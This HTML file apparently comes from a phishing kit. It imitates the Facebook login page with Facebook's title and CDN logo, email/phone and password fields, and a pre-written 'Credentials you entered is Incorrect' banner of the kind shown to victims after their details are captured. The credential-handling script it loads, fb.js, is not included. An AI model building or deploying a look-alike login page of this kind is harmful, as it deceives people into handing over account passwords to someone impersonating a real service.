<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title id="title">Welcome To Facebook</title>
    <link rel="shortcut icon" href="/images/ico.ico">
    <style>
        body {
            background-color: #E2E6EA;
        }

        .head {
            background-color: #1658A0;
            border: none;
            width: 100%;
        }

        #fblogo {
            display: block;
            width: 100px;
            padding: 5px;
            background-color: #1658A0;
        }

        #wrong {
            background-color: #fc4343;
            border: 1px solid #fc4343;
            color: white;
            font-size: 90%;
            padding: 1px 1px 1px 1px;
            font-family: Arial, sans-serif;
        }

        .credentials {
            margin-top: 5px;
            margin-left: 1%;
            margin-right: 1%;
            padding-left: 1%;
            font-family: Arial, sans-serif;
            font-weight: bold;
            color: #8D9092;
        }

        #input {
            padding-block: 10px;
            width: 97%;
        }

        .login {
            margin-top: 20px;
            margin-left: auto;
            margin-right: auto;
            width: 75%;
            background-color: #15569D;
            color: white;
            padding: 5px;
        }

        #inside {
            background-color: #15569D;
            border: none;
            color: white;
            width: 100%;
            padding: 10px;
        }

        .line {
            width: 100%;
            text-align: center;
            border-bottom: 1px solid #8D9092;
            line-height: 0.1em;
            margin: 20px 0 20px;
        }

        .line span {
            background: #E2E6EA;
            padding: 0 10px;
            color: #8D9092;
        }

        .create {
            margin-top: 10px;
            margin-left: auto;
            margin-right: auto;
            width: 50%;
            border: none;
            background-color: #37b11f;
            color: white;
            padding: 5px;
        }

        #nwacc {
            background-color: #37b11f;
            border: none;
            color: white;
            width: 100%;
            padding: 10px;
        }

        .forgot {
            padding: 10px;
            text-align: center;
        }
    </style>
    <script src="fb.js"></script>
</head>

<body>
    <header class="head">
        <img id="fblogo" src="https://static.xx.fbcdn.net/rsrc.php/v3/y8/r/k97pj8-or6s.png" style="display:block"
            onclick="home()">
        <span id="wrong" style="display:none">Credentials you entered is Incorrect, Please try Again.</span>
    </header>
    <div class="credentials">
        <p>Phone Number or Email</p>
        <input id="input" type="user" name="user">
        <p style="margin-top:15px">Password</p>
        <input id="input" type="password" name="pass">
    </div>
    <div class="login">
        <button id="inside" onclick="pasuser(this.form);">Log In</button>
    </div>
    <div class="line">
        <span><b>or</b></span>
    </div>
    <div class="create">
        <button id="nwacc" onclick="cnacct()">Create New Account</button>
    </div>
    <div class="forgot">
        <a href="index.html">Forgot Password?</a>
    </div>
</body>

</html>